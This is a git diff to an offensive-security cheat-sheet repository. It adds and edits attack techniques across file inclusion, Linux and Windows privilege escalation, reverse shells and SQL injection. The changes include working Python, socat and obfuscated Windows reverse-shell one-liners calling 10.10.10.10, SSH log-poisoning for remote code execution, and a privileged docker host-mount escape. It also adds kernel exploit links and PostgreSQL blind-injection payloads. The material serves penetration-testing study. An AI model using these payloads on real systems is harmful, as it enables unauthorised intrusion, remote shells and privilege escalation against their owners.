diff --git a/File Inclusion/README.md b/File Inclusion/README.md
index fe79d7e0..255a83d7 100644
--- a/File Inclusion/README.md
+++ b/File Inclusion/README.md
@@ -291,6 +291,20 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log
 http://example.com/index.php?page=/usr/local/apache2/log/error_log
 ```
 
+### RCE via SSH
+
+Try to ssh into the box with a PHP code as username ``.
+
+```powershell
+ssh @10.10.10.10
+```
+
+Then include the SSH log files inside the Web Application.
+
+```powershell
+http://example.com/index.php?page=/var/log/auth.log&cmd=id
+```
+
 ### RCE via Mail
 
 First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`.
diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md
index f017fae4..de88808f 100644
--- a/Methodology and Resources/Linux - Privilege Escalation.md
+++ b/Methodology and Resources/Linux - Privilege Escalation.md
@@ -187,11 +187,19 @@ Check inside the file, to find other paths with write permissions.
 /etc/cron.weekly
 /etc/sudoers
 /etc/exports
-/etc/at.allow
-/etc/at.deny
 /etc/anacrontab
 /var/spool/cron
 /var/spool/cron/crontabs/root
+
+crontab -l
+ls -alh /var/spool/cron;
+ls -al /etc/ | grep cron
+ls -al /etc/cron*
+cat /etc/cron*
+cat /etc/at.allow
+cat /etc/at.deny
+cat /etc/cron.allow
+cat /etc/cron.deny*
 ```
 
 ## Systemd timers
@@ -514,6 +522,12 @@ $> docker run -it --rm -v $PWD:/mnt bash
 $> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd
 ```
 
+Almost similar but you will also see all processes running on the host and be connected to the same NICs.
+
+```powershell
+docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash
+```
+
 Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell
 
 ```powershell
@@ -584,6 +598,7 @@ Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
 echo 0 > /proc/sys/vm/dirty_writeback_centisecs
 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
 https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
+https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
 ```
 
 ### CVE-2010-3904 (RDS)
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index e08aff05..57e24be4 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -55,7 +55,7 @@ nc -u -lvp 4242
 
 ```powershell
 user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
-user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
+user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4242
 ```
 
 Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
@@ -78,12 +78,12 @@ Linux only IPv4 ```python -export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +export RHOST="10.10.10.10";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` IPv4 ```python -python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` IPv6 
@@ -98,7 +98,7 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC Windows only ```powershell -C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, 
__g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for 
__l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" ``` ### PHP diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 83de0f52..8700ea7c 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -15,9 +15,11 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Runas](#eop---runas) -* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures) +* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato) * [MS08-067 (NetAPI)](#ms08-067-netapi) + * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) + * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) @@ -264,6 +266,8 @@ C:\Windows\system32\sysprep.inf C:\Windows\system32\sysprep\sysprep.xml ``` +Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`. + Example content ```powershell 
@@ -668,6 +672,23 @@ python ms08-067.py 10.0.0.1 6 445 ``` +### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 + +'KiTrap0D' User Mode to Ring Escalation (MS10-015) + +```powershell +https://www.exploit-db.com/exploits/11199 + +Metasploit : exploit/windows/local/ms10_015_kitrap0d +``` + +### MS11-080 (afd.sys) - Microsoft Windows XP/2003 + +```powershell +Python: https://www.exploit-db.com/exploits/18176 +Metasploit: exploit/windows/local/ms11_080_afdjoinleaf +``` + ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) Check if the patch is installed : `wmic qfe list | findstr "3139914"` diff --git a/SQL Injection/PostgreSQL Injection.md b/SQL Injection/PostgreSQL Injection.md index e8880db8..69740cc2 100644 --- a/SQL Injection/PostgreSQL Injection.md +++ b/SQL Injection/PostgreSQL Injection.md @@ -1,4 +1,15 @@ -# POSTGRESQL +# PostgreSQL injection + +## Summary + +* [PostgreSQL Comments](#postgresql-comments) +* [PostgreSQL Error Based](#postgresql-error-based) +* [PostgreSQL Blind](#postgresql-blind) +* [PostgreSQL Time Based](#postgresql-time-based) +* [PostgreSQL File Read](#postgresql-file-read) +* [PostgreSQL File Write](#postgresql-file-write) +* [PostgreSQL Command execution](#postgresql-command-execution) +* [References](#references) ## PostgreSQL Comments @@ -7,7 +18,7 @@ /**/ ``` -## PostgreSQL Error Based - Basic +## PostgreSQL Error Based ```sql ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC) @@ -16,6 +27,13 @@ ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC) ``` +## PostgreSQL Blind + +```sql +' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK +' and substr(version(),1,10) = 'PostgreXXX' and '1 -> KO +``` + ## PostgreSQL Time Based ```sql 
@@ -47,7 +65,7 @@ SELECT * FROM pentestlab;
 COPY pentestlab(t) TO '/tmp/pentestlab';
 ```
 
-## PostgreSQL - Command execution
+## PostgreSQL Command execution
 
 CVE-2019–9193, can be used from [Metasploit](https://github.com/rapid7/metasploit-framework/pull/11598) if you have a direct access to the database, otherwise you need to execute manually the following SQL queries.
 
@@ -64,4 +82,5 @@ DROP TABLE IF EXISTS cmd_exec; -- [Optional] Remove the table
 ## References
 
 * [A Penetration Tester’s Guide to PostgreSQL - David Hayter](https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9)
-* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
\ No newline at end of file
+* [Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest - Mar 20 2019 - GreenWolf](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5)
+* [SQL Injection /webApp/oma_conf ctx parameter (viestinta.lahitapiola.fi) - December 8, 2016 - Sergey Bobrov (bobrov)](https://hackerone.com/reports/181803)
\ No newline at end of file
diff --git a/SQL Injection/README.md b/SQL Injection/README.md
index 87913ec4..e238323a 100644
--- a/SQL Injection/README.md
+++ b/SQL Injection/README.md
@@ -19,6 +19,17 @@ Attempting to manipulate SQL queries may have goals including:
 * [Entry point detection](#entry-point-detection)
 * [DBMS Identification](#dbms-identification)
 * [SQL injection using SQLmap](#sql-injection-using-sqlmap)
+ * [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
+ * [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
+ * [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragent-header-referer-cookie)
+ * [Second order injection](#second-order-injection)
+ * [Shell](#shell)
+ * [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
+ * [Using TOR with SQLmap](#using-tor-with-sqlmap)
+ * [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
+ * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
+ * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
+ * [General tamper option and tamper's list](#general-tamper-option-and-tamper-s-list)
 * [Authentication bypass](#authentication-bypass)
 * [Polyglot injection](#polyglot-injection-multicontext)
 * [Routed injection](#routed-injection)